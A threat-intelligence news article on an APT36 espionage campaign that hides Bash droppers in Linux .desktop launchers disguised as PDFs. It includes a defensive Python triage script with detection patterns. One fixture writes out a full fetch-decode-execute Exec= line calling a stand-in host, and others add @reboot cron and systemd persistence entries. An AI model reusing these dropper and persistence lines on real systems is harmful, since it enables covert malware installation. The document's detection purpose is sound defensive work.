
A Pakistan-linked advanced persistent threat (APT) group has been observed using a new attack vector, abusing Linux .desktop files to deploy custom malware in a targeted espionage campaign against Indian government and defense entities.
The group, tracked as APT36 (also known as Transparent Tribe, Operation C-Major, and Mythic Leopard), has been active since at least 2013 and is known for its persistent focus on Indian targets. Its latest campaign, uncovered on August 1, 2025, and still ongoing, marks a significant evolution in its tactics by targeting Linux systems, specifically those running India’s indigenous BOSS (Bharat Operating System Solutions).
The Attack Vector: A Wolf in Sheep’s Clothing
The campaign begins with a spear-phishing email carrying a ZIP archive named Meeting_Notice_Ltr_ID1543ops.pdf_.zip. Inside, instead of a PDF, is a malicious .desktop file, the launcher format that Linux desktop environments use to start applications. The file is disguised on three levels:
- Its Icon= entry points to a PDF icon, so the target believes it is a document.
- Its Exec= line, which normally names the application to launch, instead carries Bash commands.
- It is declared as an application (Type=Application) and can be placed in an autostart directory so it runs at every login, providing persistence.
When executed, the file performs a multi-stage attack:
- Decoy: it opens a benign PDF in Firefox so the victim sees the document they expected.
- Payload retrieval: it silently downloads a hex-encoded payload from the attacker-controlled domain securestore[.]cv.
- Execution: it decodes the payload and runs it in the background, so the malware operates with no visible sign to the user.
The Malware: Stealthy and Persistent

The final payload is a statically linked 64-bit ELF executable built for x86-64 Linux. Analysis shows signs of obfuscation and packing, including an abnormally large section header offset and missing section names, both intended to thwart analysis. Neither trick affects execution, because the kernel loader maps the binary from its program headers and ignores the section table, but both break section-based views in tools such as readelf and objdump, so analysts should work from the program headers and a memory dump rather than from the section table.
Key capabilities of the malware include:
- Command and control (C2): it embeds the hardcoded C2 address modgovindia[.]space:4000.
- Covert communication: it uses DNS queries and UDP sockets, traffic that blends with ordinary name resolution and is harder to detect and block than a TCP connection to an unusual port.
- Persistence: it creates cron jobs and abuses systemd services so that it survives reboots and logouts.
- Espionage: once established, it gives the operators full data exfiltration and remote control of the host.
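To make the launcher abuse described in the attack-vector section and the cron and systemd persistence listed above concrete, here is a small triage script. It is added as an example and is not code from the campaign, from CYFIRMA, or from the original article. It parses .desktop files and flags the pattern described above (document icon and document-like name on an Application entry, an Exec= line that spawns a shell to fetch, decode and background a payload, and placement in an autostart directory), then runs the same command heuristic over crontab lines and systemd unit ExecStart= lines. The indicator regexes, the fixture contents, the example.invalid domain, the /tmp/.s drop path and the analyst home directory are all assumptions constructed for the demonstration; nothing is fetched or executed.

```python
import re

# Heuristic indicators of a shell-driven dropper hidden in a launcher or job
# command. Assumed triage patterns, not signatures from the reported sample.
INDICATORS = (
    ("shell_wrapper", re.compile(r"\b(?:ba)?sh\s+-c\b")),
    ("downloader", re.compile(r"\b(?:curl|wget)\b")),
    ("decoder", re.compile(r"\bxxd\s+-r\b|\bbase64\s+(?:-d|--decode)\b|\\x[0-9a-f]{2}")),
    ("drop_path", re.compile(r"/(?:tmp|dev/shm|var/tmp)/")),
    ("background", re.compile(r"\bnohup\b|\bdisown\b|&\s*[\"']?\s*$|&\s*;")),
)
DOC_ICON = re.compile(r"pdf|document|office|text", re.I)
DOC_EXT = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx")

# Constructed fixtures (assumed content, not the campaign's files). The dropper
# entry follows the pattern described in the article; the .invalid domain cannot resolve.
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Firefox
Icon=firefox
Exec=firefox %u
"""
DROPPER_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Notice_Ltr.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "firefox /tmp/decoy.pdf & curl -s http://dropper.example.invalid/p.hex | xxd -r -p > /tmp/.s; chmod +x /tmp/.s; nohup /tmp/.s >/dev/null 2>&1 &"
"""
CRONTAB = """0 3 * * * /usr/bin/certbot renew --quiet
@reboot /tmp/.s
"""
UNIT = """[Unit]
Description=Update helper
[Service]
ExecStart=/bin/bash -c "/tmp/.s"
"""


def score_command(cmd):
    """Names of the indicators matched by one command string (empty = clean)."""
    return [name for name, rx in INDICATORS if rx.search(cmd)]


def parse_desktop(text):
    """Minimal parser for the [Desktop Entry] group: key=value pairs, # comments."""
    entry, in_group = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("["):
            in_group = line == "[Desktop Entry]"
        elif in_group and "=" in line:
            key, value = line.split("=", 1)
            entry[key.strip()] = value.strip()
    return entry


def assess_desktop(text, path=""):
    """Indicators for one .desktop file; path is used only for the autostart check."""
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    hits = score_command(exec_line)
    # The disguise itself is evidence: a document icon on an entry whose Exec=
    # line spawns a shell instead of a viewer, or a document name on an Application.
    if DOC_ICON.search(entry.get("Icon", "")) and INDICATORS[0][1].search(exec_line):
        hits.append("document_icon_shell_exec")
    if entry.get("Type") == "Application" and entry.get("Name", "").lower().endswith(DOC_EXT):
        hits.append("document_name_on_application")
    if "/autostart/" in path:
        hits.append("autostart_location")
    return hits


def assess_crontab(text):
    """(command, indicators) for every crontab line whose command matches."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = 1 if line.startswith("@") else 5  # "@reboot cmd" vs "m h dom mon dow cmd"
        parts = line.split(None, fields)
        hits = score_command(parts[fields]) if len(parts) > fields else []  # skips MAILTO= lines
        if hits:
            findings.append((parts[fields], hits))
    return findings


def assess_systemd_unit(text):
    """(command, indicators) for every ExecStart= line of a unit file."""
    cmds = [m.strip() for m in re.findall(r"^\s*ExecStart=(.+)$", text, re.M)]
    return [(c, score_command(c)) for c in cmds if score_command(c)]


def triage():
    """Run all checks over the fixtures; a real sweep would read files from disk instead."""
    return {
        "benign_launcher": assess_desktop(BENIGN_DESKTOP, "/usr/share/applications/firefox.desktop"),
        "dropper": assess_desktop(DROPPER_DESKTOP, "/home/analyst/.config/autostart/Meeting_Notice_Ltr.pdf.desktop"),
        "crontab": assess_crontab(CRONTAB),
        "systemd_unit": assess_systemd_unit(UNIT),
    }
```

Calling triage() returns an empty list for the Firefox launcher and eight indicators for the constructed dropper, plus the /tmp/.s findings from the crontab and unit fixtures. In practice the same functions would be pointed at ~/.config/autostart, ~/Downloads, the user and system crontabs, and ~/.config/systemd/user; the heuristics are deliberately coarse, so treat a hit as a reason to open the file, not as a verdict.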
A Strategic Shift in Tactics
APT36 is historically known for targeting Windows systems with custom Remote Access Trojans (RATs) like Crimson and Peppy, which can exfiltrate data, capture screenshots, and even record webcam streams.
This shift to Linux demonstrates a strategic adaptation.
“The adoption of .desktop payloads targeting Linux BOSS reflects a tactical shift toward exploiting indigenous technologies,” concludes a report from cybersecurity firm CYFIRMA. “Combined with traditional Windows-based malware and mobile implants, this shows the group’s intent to diversify access vectors and ensure persistence even in hardened environments.”
While the Indian government remains its primary focus, APT36 has expanded its operations to adjacent sectors like education, research, and civil society, increasing the attack surface and risk for a broader range of organizations.
The Bottom Line for Defense: This campaign is a stark reminder that threat actors continue to innovate. The abuse of a trusted launcher format such as .desktop files demands heightened user vigilance against spear-phishing, even when a message appears to come from a legitimate source. For organizations, particularly in government and defense, detection that analyzes what a file does when it is opened, not merely how it looks, is critical to defending against these evolving, multi-platform threats.